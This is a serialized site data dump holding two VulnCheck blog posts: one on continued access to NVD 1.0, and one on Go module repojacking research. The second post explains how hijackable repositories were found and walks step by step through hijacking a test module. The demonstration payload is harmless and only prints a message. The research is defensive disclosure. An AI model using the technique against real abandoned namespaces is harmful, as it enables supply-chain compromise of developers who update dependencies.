1.0",[83930],{"name":32060,"avatar":32061,"link":33025,"linkName":32063},{"type":15,"value":83932,"toc":84020},[83933,83936,83939,83942,83945,83949,83952,83955,83958,83961,83965,83985,83990,83993,83997,84003,84006],[18,83934,83935],{},"Managing vulnerabilities at scale is something the entire cybersecurity ecosystem has struggled with for a long time.",[18,83937,83938],{},"As exploited vulnerabilities are becoming a more prominent and driving threat to organizations - particularly freely available vulnerabilities disclosed by software and product manufacturers - it has become clear that vulnerability prioritization, or understanding the level of exploitability of a particular vulnerability, is still really, really hard.",[18,83940,83941],{},"One of the tried and true resources provided to the broader cybersecurity market is NIST’s NVD - the National Vulnerability Database. This tool is leveraged by most, if not all, SecOps and vulnerability management teams. And, there are likely millions of customized workflows built around the NVD feed in every single cybersecurity product designed to enrich this function.",[18,83943,83944],{},"Currently, NVD v1.0 is set to be retired on December 15. As part of VulnCheck’s new Community Platform tier, we are open-sourcing the availability of NVD v1.0, so that teams can have access to it without disrupting custom workflows or without having to re-tool how humans and machines consume CVE data.",[61,83946,83948],{"id":83947},"why-continuity-with-nvd-10-is-essential","Why Continuity With NVD 1.0 is Essential",[18,83950,83951],{},"Speed and efficiency are not just goals – they are necessities in prioritizing and managing vulnerabilities in products and software. At VulnCheck, our mission revolves around this principle: to accelerate the cybersecurity ecosystem's ability to identify and neutralize threats, you have to be quicker, and you simply need better data all the time.",[18,83953,83954],{},"The importance of NVD 1.0 in the daily operations of vulnerability management and SecOps teams cannot be overstated - it's the best public yet validated source available to cybersecurity product managers and to SecOps, IR, and vulnerability management teams next to the CISA KEV list.",[18,83956,83957],{},"However, as we edge closer to the NVD's 2.0 API migration deadline on December 15, we are stepping up to ensure that this transition does not slow down the entire ecosystem built around it.",[18,83959,83960],{},"Our commitment to maintaining NIST’s NVD 1.0 reflects our dedication to keeping the cybersecurity community agile and responsive. It's cool working for a company willing to put resources behind supporting the broader cyber ecosystem.",[61,83962,83964],{"id":83963},"why-is-this-important","Why is This Important?",[22,83966,83967,83973,83979],{},[25,83968,83969,83972],{},[295,83970,83971],{},"Facilitating Uninterrupted Workflows",": The cybersecurity community can maintain its current pace and efficiency without the disruption of adapting to new API structures.",[25,83974,83975,83978],{},[295,83976,83977],{},"Supporting Strategic Evolution at a Team’s Own Pace",": This initiative provides the time needed for teams to thoughtfully plan and adapt to NVD 2.0, ensuring no compromise in their operational effectiveness.",[25,83980,83981,83984],{},[295,83982,83983],{},"Promoting Collective Intelligence is Always a Good Thing",": By fostering a community-driven approach, we enable the sharing of strategies and insights, enhancing the collective ability to combat cyber threats.",[43656,83986,83987],{"author":69301,"position":69302},[18,83988,83989],{},"Speed and efficiency in addressing vulnerabilities are not just operational goals; they are critical to cybersecurity success. By maintaining NVD 1.0, we're not just making a tool available – we're upholding a staple of the broader cybersecurity ecosystem. The changes brought on by NVD's 2.0 APIs will force development teams to redesign how CVE data is acquired, processed, and loaded, which will take significant time and testing. Our goal is to ensure that all vulnerability management operations designed for NVD 1.0 will function as needed until teams are ready to make the jump.",[18,83991,83992],{},"VulnCheck’s commitment to NVD 1.0 is just one part of our broader vision. We're also focused on facilitating a well-planned migration to NVD 2.0, ensuring that the cybersecurity community is equipped for future challenges.",[61,83994,83996],{"id":83995},"get-it-today","Get it Today",[18,83998,83999,84000,59],{},"Learn more about how we're supporting rapid and efficient vulnerability management and get access to the NVD 1.0 database ",[47,84001,305],{"href":84002},"\u002Fnvd",[18,84004,84005],{},"Other Community Platform tier resources we have available include:",[22,84007,84008,84014],{},[25,84009,84010,84013],{},[47,84011,22289],{"href":84012},"\u002Fxdb"," - an index of exploit proof of concept code in git repositories.",[25,84015,84016,84019],{},[47,84017,32933],{"href":84018},"\u002Fadvisories\u002Freport"," for responsible disclosure.",{"title":219,"searchDepth":220,"depth":220,"links":84021},[84022,84023,84024],{"id":83947,"depth":220,"text":83948},{"id":83963,"depth":220,"text":83964},{"id":83995,"depth":220,"text":83996},"2023-12-07",{"slug":84027},"nvd-why","\u002Fblog\u002Fnvd-why",{"title":83928,"description":83935},"blog\u002Fnvd-why",[33173],"ZagiIANW91GSRsrYBIHQWqGZqR0mnisVSNy-mKvmoEQ",{"id":84034,"title":84035,"articles":84036,"authors":84080,"body":84082,"date":84040,"description":84748,"extension":234,"image":7,"link":7,"meta":84749,"navigation":237,"path":84751,"seo":84752,"series":7,"stem":84753,"subtype":7,"tags":7,"__hash__":84754},"blog\u002Fblog\u002Fgo-repojacking.md","Hijackable Go Module Repositories",[84037,84041,84045,84049,84053,84057,84060,84062,84067,84071,84076],{"title":84038,"source":39566,"link":84039,"date":84040},"A widespread threat to industrial control systems.","https:\u002F\u002Fthecyberwire.com\u002Fnewsletters\u002Fdaily-briefing\u002F12\u002F229","2023-12-04",{"title":84042,"source":14382,"link":84043,"date":84044},"15,000 Go Module Repositories on GitHub Vulnerable to Repojacking Attack","https:\u002F\u002Fthehackernews.com\u002F2023\u002F12\u002F15000-go-module-repositories-on-github.html?m=1","2023-12-05",{"title":84046,"source":84047,"link":84048,"date":61897},"Cyber Security Today, Dec. 6, 2023 – Warnings about Russian-based cyber attacks, and more","IT World Canada","https:\u002F\u002Fwww.itworldcanada.com\u002Farticle\u002Fcyber-security-today-dec-6-2023-warnings-about-russian-based-cyber-attacks-and-more\u002F554631",{"title":84050,"source":84051,"link":84052,"date":61897},"Thousands of Go module repositories on GitHub are vulnerable to attack","MSN","https:\u002F\u002Fwww.msn.com\u002Fen-us\u002Fnews\u002Ftechnology\u002Fthousands-of-go-module-repositories-on-github-are-vulnerable-to-attack\u002Far-AA1l6kcK",{"title":84054,"source":84055,"link":84056,"date":61897},"Risky Biz News: US government agencies lag on logging compliance","Risky Business News","https:\u002F\u002Friskybiznews.substack.com\u002Fp\u002Fus-government-agencies-lag-on-logging?utm_source=post-email-title&publication_id=852612&post_id=139474790&utm_campaign=email-post-title&isFreemail=true&r=2rnh0k&utm_medium=email",{"title":84058,"source":11233,"link":84059,"date":61897},"Repojacking attacks against over 15K Go module repositories likely","https:\u002F\u002Fwww.scmagazine.com\u002Fbrief\u002Frepojacking-attacks-against-over-15k-go-module-repositories-likely",{"title":84050,"source":60960,"link":84061,"date":61897},"https:\u002F\u002Fwww.techradar.com\u002Fpro\u002Fsecurity\u002Fthousands-of-go-module-repositories-on-github-are-vulnerable-to-attack",{"title":84063,"source":84064,"link":84065,"date":84066},"Iran behind attacks on PLCs.","The CyberWire Daily Podcast","https:\u002F\u002Fthecyberwire.com\u002Fpodcasts\u002Fdaily-podcast\u002F1959\u002Fnotes","2023-12-08",{"title":84068,"source":84069,"link":84070,"date":68288},"Number of incidents affecting GitHub, Bitbucket, GitLab, and Jira continues to rise - Help Net Security","Help Net Security","https:\u002F\u002Fwww.helpnetsecurity.com\u002F2024\u002F08\u002F07\u002Fgithub-bitbucket-gitlab-jira-incidents\u002F",{"title":84072,"source":84073,"link":84074,"date":84075},"DevOps threats report released from GitProtect io","App Developer Magazine","https:\u002F\u002Fappdevelopermagazine.com\u002Fdevops-threats-report-released-from-gitprotect-io\u002F","2024-08-12",{"title":84077,"source":84078,"link":84079,"date":65178},"DevOps threats strike every few days","ChannelWise","https:\u002F\u002Fchannelwise.co.za\u002Fdevops-threats-strike-every-few-days\u002F",[84081],{"name":10391,"avatar":10392,"link":10393,"linkName":10394},{"type":15,"value":84083,"toc":84735},[84084,84087,84091,84116,84133,84142,84146,84162,84165,84202,84212,84221,84226,84230,84233,84244,84250,84253,84255,84258,84262,84274,84278,84286,84292,84299,84363,84367,84370,84431,84445,84451,84458,84464,84467,84485,84489,84496,84502,84506,84509,84523,84590,84596,84601,84606,84611,84615,84618,84718,84720,84732],[263,84085],{":list":84086,"ico":266,"title":84035},"[\"VulnCheck analyzed the Go module ecosystem looking for modules whose source code repository could be vulnerable to repository hijacking (repojacking).\",\"VulnCheck found more than 9,000 repositories are vulnerable to repojacking due to GitHub username changes.\",\"VulnCheck found more than 6,000 repositories were vulnerable to repojacking due to account deletion.\",\"Combined, these 15,000 repositories support more than 800,000 Go module-versions.\"]",[61,84088,84090],{"id":84089},"why-go-is-particularly-vulnerable-to-repojacking","Why Go is Particularly Vulnerable to Repojacking",[18,84092,84093,84094,1554,84099,84104,84105,982,84110,84115],{},"The Go module ecosystem is unique because it’s decentralized. Other packaging systems like ",[47,84095,84098],{"href":84096,"rel":84097},"https:\u002F\u002Fpypi.org\u002F",[51],"Pypi",[47,84100,84103],{"href":84101,"rel":84102},"https:\u002F\u002Fwww.npmjs.com\u002F",[51],"NPM"," require developers to create accounts to upload their packages. This gives the package platform the ability to moderate users and content. That isn’t the case with Go. Go developers publish modules by pushing their code to source control platforms like GitHub. Anyone can then instruct the ",[47,84106,84109],{"href":84107,"rel":84108},"https:\u002F\u002Fproxy.golang.org",[51],"Go module mirror",[47,84111,84114],{"href":84112,"rel":84113},"https:\u002F\u002Fpkg.go.dev",[51],"pkg.go.dev"," to cache the module’s details.",[18,84117,84118,84119,982,84122,84125,84126,84128,84129,59],{},"This decentralization makes Go module repositories particularly vulnerable to repojacking. A repository becomes vulnerable when the module author changes their username or deletes their account. At that time, an attacker can register the newly unused username, duplicate the module repository, and publish a new module to ",[886,84120,84121],{},"proxy.golang.org",[886,84123,84124],{},"go.pkg.dev",". A detailed step-by-step breakdown of how that is done and what the resulting ",[886,84127,84124],{}," page looks like can be found in ",[47,84130,84132],{"href":84131},"#appendix-a-hijacking-a-go-module-on-github","Appendix A",[18,84134,84135,84136,84141],{},"GitHub does have some protections against repojacking. Their ",[47,84137,84140],{"href":84138,"rel":84139},"https:\u002F\u002Fgithub.blog\u002F2018-04-18-new-tools-for-open-source-maintainers\u002F#popular-repository-namespace-retirement",[51],"popular repository namespace retirement"," feature prevents repojacking of any repository “that had more than 100 clones in the week leading up to the owner’s account being renamed or deleted.” That might sound reasonable, but it isn’t necessarily for Go. Go modules are typically cached by the Module mirror, so there is no real need to interact with or clone from the source repository. For some context, VulnCheck has an open source library hosted on GitHub that we use daily and has 170+ stars, but that repository has only seen 20 clones in the last week. Based on that, the 100 clones protection isn’t necessarily as good as GitHub might think it is.",[61,84143,84145],{"id":84144},"hunting-for-hijackable-go-modules","Hunting for Hijackable Go Modules",[18,84147,84148,84149,84154,84155,84158,84159,84161],{},"In June 2023, ",[47,84150,84153],{"href":84151,"rel":84152},"https:\u002F\u002Fblog.aquasec.com\u002Fgithub-dataset-research-reveals-millions-potentially-vulnerable-to-repojacking",[51],"Aquasec"," published research positing millions of hijackable GitHub repositories. Knowing that Go is particularly vulnerable to this attack vector, we set out to enumerate exactly how many Go module-versions might be affected. By ",[295,84156,84157],{},"module-version",", we mean a module plus all its versions. This is important to note because, as detailed in ",[47,84160,84132],{"href":84131},", after successfully hijacking the attacker's new module will be listed as an “updated” module for all of the old module-versions.",[18,84163,84164],{},"VulnCheck tracks more than 20 million Go module-versions. It’s not exactly a small dataset, but the algorithm for tracking down the repojackable modules is relatively straightforward:",[1789,84166,84167,84177,84180,84190,84193,84196],{},[25,84168,84169,84170,84173,84174,59],{},"For each module, infer the repository URL from the module name. For example, ",[886,84171,84172],{},"github.com\u002Fvulncheck-oss\u002Fgo-exploit"," is a Go module whose source is hosted at ",[47,84175,14297],{"href":14297,"rel":84176},[51],[25,84178,84179],{},"Attempt to connect to each repository.",[25,84181,84182,84183,84185,84186,84189],{},"An HTTP 301 response indicates a username change, a repository name change, or both. For our purposes, we validated that the repository name was the same (e.g. ",[886,84184,20558],{},"), but the username had changed. We also validated that the original user account (e.g. ",[886,84187,84188],{},"vulncheck-oss",") didn’t exist. That further weeded out things like repository transfers. The repositories that made it through all those steps were considered potentially vulnerable to repojacking.",[25,84191,84192],{},"An HTTP 404 response indicated the repository no longer exists. We then would see if the username still existed. If not, then this, too, is potentially vulnerable to repojacking.",[25,84194,84195],{},"An HTTP 200 response indicated the repository was not vulnerable.",[25,84197,84198,84199,84201],{},"We then validated that the potentially hijackable repository actually had an entry in ",[886,84200,84124],{}," (you can cache pretty much anything with the Module mirror, so it’s important to weed out non-Go module stuff).",[18,84203,84204,84205,84207,84208,84211],{},"What you have left over is a lot of repositories that could be repojacked (assuming the 100 clones in the last seven days issue isn’t a problem). Our first finding is that more than ",[295,84206,65874],{}," Go module GitHub repositories are vulnerable to repojacking due to a username change. The potential repojacking affects more than ",[295,84209,84210],{},"500,000"," Go module-versions.",[18,84213,84214,84215,84220],{},"In order to determine how popular the repositories are, we grabbed each repositories’ number of GitHub ",[47,84216,84219],{"href":84217,"rel":84218},"https:\u002F\u002Fdocs.github.com\u002Fen\u002Fget-started\u002Fexploring-projects-on-github\u002Fsaving-repositories-with-stars",[51],"stars",". We’ve graphed the results in buckets from 0 to 1000.",[1925,84222,84223],{},[18,84224,84225],{},"Hijackable Go Module Repositories Grouped by Stars",[11128,84227],{":labels":84228,":values":84229},"[0,\"1-10\",\"11-50\",\"51-100\",\"101-200\",\"201-500\",\"501-1000\"]","[5995,1968,705,210,147,105,50]",[18,84231,84232],{},"The majority of the repositories have zero stars. Those are of little to no value to an attacker. The remaining 3,000 repositories have between 1 and 1000 stars. The likelihood of a repository being valuable to an attacker increases with stars, but stars alone can’t say how useful an attack might be. The actual usage within the Go ecosystem matters, because exploitation relies on a developer updating to the new module.",[18,84234,84235,84236,84239,84240,84243],{},"The other category we tracked is repositories that are hijackable because the GitHub account had been deleted. We identified more than ",[295,84237,84238],{},"6,000"," of this type of repository, ultimately affecting nearly ",[295,84241,84242],{},"300,000"," module-versions. Because the repositories have been deleted, we can’t find how many stars they have. An attacker would have to rely on finding usage patterns - ultimately searching for imports of the code.",[18,84245,84246],{},[68,84247],{":width":10862,"alt":84248,"src":84249},"Searching abandoned usage on GitHub","\u002Fblog\u002Fgo-repojacking\u002Fusage-pattern.png",[18,84251,84252],{},"That’s a heavy lift, but worthwhile for the right attacker. Still, even finding use in the wild isn’t enough. Ultimately, the victim will need to update to the attacker’s new module, because the attacker cannot overwrite old modules. So, while the threat is real, repojacking within the Go ecosystem is not an immediate win for the attacker.",[61,84254,1903],{"id":1902},[18,84256,84257],{},"Unfortunately, mitigating all of these repojackings is something that either Go or GitHub will have to take on. A third-party can’t reasonably register 15,000 GitHub accounts. Until then, it’s important for Go developers to be aware of the modules they use, and the state of the repository that the modules originated from.",[61,84259,84261],{"id":84260},"appendix-a-hijacking-a-go-module-on-github","Appendix A: Hijacking a Go Module on GitHub",[18,84263,84264,84265,84267,84268,84270,84271,84273],{},"Once published, a Go module is available via ",[886,84266,84121],{},". This ensures that modules can’t be deleted. Disappearing modules would break downstream software, which is something no one wants. However, ",[886,84269,84121],{}," is not a centralized repository like Pypi, Gem, or NPM. It’s simply a proxy and cache. When the source of the Go module is deleted or moved, ",[886,84272,84121],{}," is unaware (or doesn’t care). The result is that anyone can hijack those modules. Let’s walk through the steps of how that works.",[993,84275,84277],{"id":84276},"step-1-dev-a-creates-a-github-repository-and-makes-a-go-module","Step 1: Dev-A creates a GitHub repository and makes a Go module",[18,84279,84280,84281,84285],{},"In the example below, Dev-A created ",[47,84282,84283],{"href":84283,"rel":84284},"https:\u002F\u002Fgithub.com\u002Fvcresearcher\u002Fhelloworld",[51],". They added code to create the Helloworld module, and tagged it version 1.0.0.",[18,84287,84288],{},[68,84289],{":width":10862,"alt":84290,"src":84291},"A wild new repo appears","\u002Fblog\u002Fgo-repojacking\u002Fnew-repo.png",[18,84293,84294,84295,84298],{},"The module's ",[886,84296,84297],{},"hello.go"," file contains one function for other developers to use:",[1354,84300,84302],{"className":19022,"code":84301,"filename":84297,"language":19024,"meta":219,"style":219},"package helloworld\n\nimport \"fmt\"\n\nfunc Hello() {\n fmt.Println(\"hi.\")\n}\n",[886,84303,84304,84311,84315,84325,84329,84340,84359],{"__ignoreMap":219},[1373,84305,84306,84308],{"class":1375,"line":1376},[1373,84307,19031],{"class":1397},[1373,84309,84310],{"class":14938}," helloworld\n",[1373,84312,84313],{"class":1375,"line":220},[1373,84314,6520],{"emptyLinePlaceholder":237},[1373,84316,84317,84319,84321,84323],{"class":1375,"line":1266},[1373,84318,19043],{"class":4636},[1373,84320,4883],{"class":1387},[1373,84322,19054],{"class":19053},[1373,84324,19057],{"class":1387},[1373,84326,84327],{"class":1375,"line":1852},[1373,84328,6520],{"emptyLinePlaceholder":237},[1373,84330,84331,84333,84336,84338],{"class":1375,"line":4692},[1373,84332,19088],{"class":1397},[1373,84334,84335],{"class":7297}," Hello",[1373,84337,7514],{"class":1383},[1373,84339,4765],{"class":1383},[1373,84341,84342,84344,84346,84348,84350,84352,84355,84357],{"class":1375,"line":4724},[1373,84343,19129],{"class":4640},[1373,84345,59],{"class":1383},[1373,84347,19134],{"class":7297},[1373,84349,1384],{"class":1383},[1373,84351,183],{"class":1387},[1373,84353,84354],{"class":1391},"hi.",[1373,84356,183],{"class":1387},[1373,84358,11875],{"class":1383},[1373,84360,84361],{"class":1375,"line":4756},[1373,84362,1855],{"class":1383},[993,84364,84366],{"id":84365},"step-2-dev-b-imports-the-helloworld-module","Step 2: Dev-B imports the HelloWorld module",[18,84368,84369],{},"Another developer, Dev-B, sees the super cool Helloworld module and decides to use it in their new project.",[1354,84371,84374],{"className":19022,"code":84372,"filename":84373,"language":19024,"meta":219,"style":219},"\npackage main\n\nimport \"github.com\u002Fvcresearcher\u002Fhelloworld\"\n\nfunc main() {\n helloworld.Hello()\n}\n","main.go",[886,84375,84376,84380,84386,84390,84401,84405,84415,84427],{"__ignoreMap":219},[1373,84377,84378],{"class":1375,"line":1376},[1373,84379,6520],{"emptyLinePlaceholder":237},[1373,84381,84382,84384],{"class":1375,"line":220},[1373,84383,19031],{"class":1397},[1373,84385,19034],{"class":14938},[1373,84387,84388],{"class":1375,"line":1266},[1373,84389,6520],{"emptyLinePlaceholder":237},[1373,84391,84392,84394,84396,84399],{"class":1375,"line":1852},[1373,84393,19043],{"class":4636},[1373,84395,4883],{"class":1387},[1373,84397,84398],{"class":19053},"github.com\u002Fvcresearcher\u002Fhelloworld",[1373,84400,19057],{"class":1387},[1373,84402,84403],{"class":1375,"line":4692},[1373,84404,6520],{"emptyLinePlaceholder":237},[1373,84406,84407,84409,84411,84413],{"class":1375,"line":4724},[1373,84408,19088],{"class":1397},[1373,84410,19186],{"class":7297},[1373,84412,7514],{"class":1383},[1373,84414,4765],{"class":1383},[1373,84416,84417,84420,84422,84425],{"class":1375,"line":4756},[1373,84418,84419],{"class":4640}," helloworld",[1373,84421,59],{"class":1383},[1373,84423,84424],{"class":7297},"Hello",[1373,84426,27326],{"class":1383},[1373,84428,84429],{"class":1375,"line":4768},[1373,84430,1855],{"class":1383},[18,84432,84433,84434,982,84437,84440,84441,84444],{},"After running ",[886,84435,84436],{},"go mod init",[886,84438,84439],{},"go mod tidy",", Dev-B's ",[886,84442,84443],{},"go.mod"," looks like so:",[1354,84446,84449],{"className":84447,"code":84448,"language":1359,"meta":219},[1357],"module github.com\u002Fvcresearcher\u002Fhelloworld-impl\n\ngo 1.21.0\n\nrequire github.com\u002Fvcresearcher\u002Fhelloworld v1.0.0\n",[886,84450,84448],{"__ignoreMap":219},[18,84452,84453,84454,84457],{},"Dev-B's project dependency listing (",[886,84455,84456],{},"go list -m -u all",") now looks like:",[1354,84459,84462],{"className":84460,"code":84461,"language":1359,"meta":219},[1357],"github.com\u002Fvcresearcher\u002Fhelloworld-impl\ngithub.com\u002Fvcresearcher\u002Fhelloworld v1.0.0\n",[886,84463,84461],{"__ignoreMap":219},[18,84465,84466],{},"And, finally, when Dev-B executes their program they get the following output:",[1354,84468,84470],{"className":31740,"code":84469,"language":2186,"meta":219,"style":219},"albinolobster@mournland:~\u002Fhelloworld-impl$ .\u002Fhelloworld-impl\nhi.\n",[886,84471,84472,84480],{"__ignoreMap":219},[1373,84473,84474,84477],{"class":1375,"line":1376},[1373,84475,84476],{"class":2206},"albinolobster@mournland:~\u002Fhelloworld-impl$",[1373,84478,84479],{"class":1391}," .\u002Fhelloworld-impl\n",[1373,84481,84482],{"class":1375,"line":220},[1373,84483,84484],{"class":2206},"hi.\n",[993,84486,84488],{"id":84487},"step-3-dev-a-changes-their-github-username","Step 3: Dev-A changes their GitHub username",[18,84490,84491,84492,59],{},"Dev-A changes their username from vcresearch to vclabresearch. GitHub automatically moves the helloworld repository to ",[47,84493,84494],{"href":84494,"rel":84495},"https:\u002F\u002Fgithub.com\u002Fvclabresearch\u002Fhelloworld",[51],[18,84497,84498],{},[68,84499],{":width":10862,"alt":84500,"src":84501},"What is old is new again","\u002Fblog\u002Fgo-repojacking\u002Fmoved-repo.png",[993,84503,84505],{"id":84504},"step-4-attacker-hijacks-the-original-git-repository","Step 4: Attacker hijacks the original git repository",[18,84507,84508],{},"When Dev-A changed its name from vcresearcher to vclabresearch, GitHub moved their repositories to the new username, and set up HTTP redirects so that any request to vcresearcher\u002Fhelloworld would redirect to vclabresearch\u002Fhelloworld.",[18,84510,84511,84512,84515,84516,84519,84520,84522],{},"Attacker registers as ",[886,84513,84514],{},"vcresearcher",", creates a repository called ",[886,84517,84518],{},"helloworld",", and uploads the original repositories content. This perfectly matches the original repository created by Dev-A. Attacker then updates ",[886,84521,84297],{}," with \"malicious\" code.",[1354,84524,84527],{"className":19022,"code":84525,"filename":84526,"language":19024,"meta":219,"style":219},"\npackage helloworld\n\nimport \"fmt\"\n\nfunc Hello() {\n fmt.Println(\"hi world 😈\")\n}\n","helloworld.go",[886,84528,84529,84533,84539,84543,84553,84557,84567,84586],{"__ignoreMap":219},[1373,84530,84531],{"class":1375,"line":1376},[1373,84532,6520],{"emptyLinePlaceholder":237},[1373,84534,84535,84537],{"class":1375,"line":220},[1373,84536,19031],{"class":1397},[1373,84538,84310],{"class":14938},[1373,84540,84541],{"class":1375,"line":1266},[1373,84542,6520],{"emptyLinePlaceholder":237},[1373,84544,84545,84547,84549,84551],{"class":1375,"line":1852},[1373,84546,19043],{"class":4636},[1373,84548,4883],{"class":1387},[1373,84550,19054],{"class":19053},[1373,84552,19057],{"class":1387},[1373,84554,84555],{"class":1375,"line":4692},[1373,84556,6520],{"emptyLinePlaceholder":237},[1373,84558,84559,84561,84563,84565],{"class":1375,"line":4724},[1373,84560,19088],{"class":1397},[1373,84562,84335],{"class":7297},[1373,84564,7514],{"class":1383},[1373,84566,4765],{"class":1383},[1373,84568,84569,84571,84573,84575,84577,84579,84582,84584],{"class":1375,"line":4756},[1373,84570,19129],{"class":4640},[1373,84572,59],{"class":1383},[1373,84574,19134],{"class":7297},[1373,84576,1384],{"class":1383},[1373,84578,183],{"class":1387},[1373,84580,84581],{"class":1391},"hi world 😈",[1373,84583,183],{"class":1387},[1373,84585,11875],{"class":1383},[1373,84587,84588],{"class":1375,"line":4768},[1373,84589,1855],{"class":1383},[18,84591,84592,84593,59],{},"Attacker then publishes the module as version ",[886,84594,84595],{},"v1.0.3",[18,84597,84598],{},[68,84599],{":width":10862,"alt":84500,"src":84600},"\u002Fblog\u002Fgo-repojacking\u002Fhijacked-repo.png",[18,84602,84603,84604,59],{},"Finally, Attacker tells the Go Module Proxy to grab the updated version. The new version is merged with the old versions in ",[886,84605,84124],{},[18,84607,84608],{},[68,84609],{":width":10862,"alt":84500,"src":84610},"\u002Fblog\u002Fgo-repojacking\u002Fpkgupdated.png",[993,84612,84614],{"id":84613},"step-5-dev-b-checks-for-helloworld-module-updates-and-pulls-in-attackers-malicious-package","Step 5: Dev-B checks for helloworld module updates and pulls in Attacker’s \"malicious\" package",[18,84616,84617],{},"In the output below, Dev-B checks the available updates for their Go program. They see a new version of the helloworld module, they fetch it, and subsequently execute Attacker’s code.",[1354,84619,84621],{"className":31740,"code":84620,"language":2186,"meta":219,"style":219},"albinolobster@mournland:~\u002Fhelloworld-impl$ go list -m -u all\ngithub.com\u002Fvcresearcher\u002Fhelloworld-impl\ngithub.com\u002Fvcresearcher\u002Fhelloworld v1.0.1 [v1.0.3]\nalbinolobster@mournland:~\u002Fhelloworld-impl$ nano go.mod\nalbinolobster@mournland:~\u002Fhelloworld-impl$ go mod tidy\ngo: downloading github.com\u002Fvcresearcher\u002Fhelloworld v1.0.3\nalbinolobster@mournland:~\u002Fhelloworld-impl$ go build\nalbinolobster@mournland:~\u002Fhelloworld-impl$ .\u002Fhelloworld-impl\nhi world. 😈\n",[886,84622,84623,84641,84646,84656,84666,84678,84692,84701,84707],{"__ignoreMap":219},[1373,84624,84625,84627,84630,84632,84635,84638],{"class":1375,"line":1376},[1373,84626,84476],{"class":2206},[1373,84628,84629],{"class":1391}," go",[1373,84631,55812],{"class":1391},[1373,84633,84634],{"class":2209}," -m",[1373,84636,84637],{"class":2209}," -u",[1373,84639,84640],{"class":1391}," all\n",[1373,84642,84643],{"class":1375,"line":220},[1373,84644,84645],{"class":2206},"github.com\u002Fvcresearcher\u002Fhelloworld-impl\n",[1373,84647,84648,84650,84653],{"class":1375,"line":1266},[1373,84649,84398],{"class":2206},[1373,84651,84652],{"class":1391}," v1.0.1",[1373,84654,84655],{"class":4640}," [v1.0.3]\n",[1373,84657,84658,84660,84663],{"class":1375,"line":1852},[1373,84659,84476],{"class":2206},[1373,84661,84662],{"class":1391}," nano",[1373,84664,84665],{"class":1391}," go.mod\n",[1373,84667,84668,84670,84672,84675],{"class":1375,"line":4692},[1373,84669,84476],{"class":2206},[1373,84671,84629],{"class":1391},[1373,84673,84674],{"class":1391}," mod",[1373,84676,84677],{"class":1391}," tidy\n",[1373,84679,84680,84683,84686,84689],{"class":1375,"line":4724},[1373,84681,84682],{"class":2206},"go:",[1373,84684,84685],{"class":1391}," downloading",[1373,84687,84688],{"class":1391}," github.com\u002Fvcresearcher\u002Fhelloworld",[1373,84690,84691],{"class":1391}," v1.0.3\n",[1373,84693,84694,84696,84698],{"class":1375,"line":4756},[1373,84695,84476],{"class":2206},[1373,84697,84629],{"class":1391},[1373,84699,84700],{"class":1391}," build\n",[1373,84702,84703,84705],{"class":1375,"line":4768},[1373,84704,84476],{"class":2206},[1373,84706,84479],{"class":1391},[1373,84708,84709,84712,84715],{"class":1375,"line":4792},[1373,84710,84711],{"class":2206},"hi",[1373,84713,84714],{"class":1391}," world.",[1373,84716,84717],{"class":1391}," 😈\n",[61,84719,202],{"id":201},[18,84721,84722,84723,84728,84729,63288],{},"The VulnCheck Exploit & Vulnerability team tracks ",[47,84724,84727],{"href":84725,"rel":84726},"https:\u002F\u002Fdocs.vulncheck.com\u002Fexploit-and-vulnerability-intelligence\u002Fpackage-manager-support",[51],"more than a dozen package managers"," including NPM, Pypi, and Maven. For details, sign up to start a trial of our ",[47,84730,216],{"href":214,"rel":84731},[51],[2901,84733,84734],{},"html pre.shiki code .sGXK2, html code.shiki .sGXK2{--shiki-light:#39ADB5;--shiki-default:#D73A49;--shiki-dark:#F97583;--shiki-sepia:#F92672}html pre.shiki code .sKvfc, html code.shiki .sKvfc{--shiki-light:#E2931D;--shiki-light-text-decoration:inherit;--shiki-default:#6F42C1;--shiki-default-text-decoration:inherit;--shiki-dark:#B392F0;--shiki-dark-text-decoration:inherit;--shiki-sepia:#A6E22E;--shiki-sepia-text-decoration:underline}html pre.shiki code .sRxSC, html code.shiki .sRxSC{--shiki-light:#39ADB5;--shiki-light-font-style:italic;--shiki-default:#D73A49;--shiki-default-font-style:inherit;--shiki-dark:#F97583;--shiki-dark-font-style:inherit;--shiki-sepia:#F92672;--shiki-sepia-font-style:inherit}html pre.shiki code .siCPE, html code.shiki .siCPE{--shiki-light:#39ADB5;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#E6DB74}html pre.shiki code .sP9PO, html code.shiki .sP9PO{--shiki-light:#E2931D;--shiki-default:#6F42C1;--shiki-dark:#B392F0;--shiki-sepia:#E6DB74}html pre.shiki code .sD0ED, html code.shiki .sD0ED{--shiki-light:#6182B8;--shiki-default:#6F42C1;--shiki-dark:#B392F0;--shiki-sepia:#A6E22E}html pre.shiki code .swvn1, html code.shiki .swvn1{--shiki-light:#39ADB5;--shiki-default:#24292E;--shiki-dark:#E1E4E8;--shiki-sepia:#F8F8F2}html pre.shiki code .ss--_, html code.shiki .ss--_{--shiki-light:#90A4AE;--shiki-default:#24292E;--shiki-dark:#E1E4E8;--shiki-sepia:#F8F8F2}html pre.shiki code .sLACW, html code.shiki .sLACW{--shiki-light:#91B859;--shiki-default:#032F62;--shiki-dark:#9ECBFF;--shiki-sepia:#E6DB74}html .light .shiki span {color: var(--shiki-light);background: var(--shiki-light-bg);font-style: var(--shiki-light-font-style);font-weight: var(--shiki-light-font-weight);text-decoration: var(--shiki-light-text-decoration);}html.light .shiki span {color: var(--shiki-light);background: var(--shiki-light-bg);font-style: var(--shiki-light-font-style);font-weight: var(--shiki-light-font-weight);text-decoration: var(--shiki-light-text-decoration);}html .default .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .shiki span {color: var(--shiki-default);background: var(--shiki-default-bg);font-style: var(--shiki-default-font-style);font-weight: var(--shiki-default-font-weight);text-decoration: var(--shiki-default-text-decoration);}html .dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html.dark .shiki span {color: var(--shiki-dark);background: var(--shiki-dark-bg);font-style: var(--shiki-dark-font-style);font-weight: var(--shiki-dark-font-weight);text-decoration: var(--shiki-dark-text-decoration);}html .sepia .shiki span {color: var(--shiki-sepia);background: var(--shiki-sepia-bg);font-style: var(--shiki-sepia-font-style);font-weight: var(--shiki-sepia-font-weight);text-decoration: var(--shiki-sepia-text-decoration);}html.sepia .shiki span {color: var(--shiki-sepia);background: 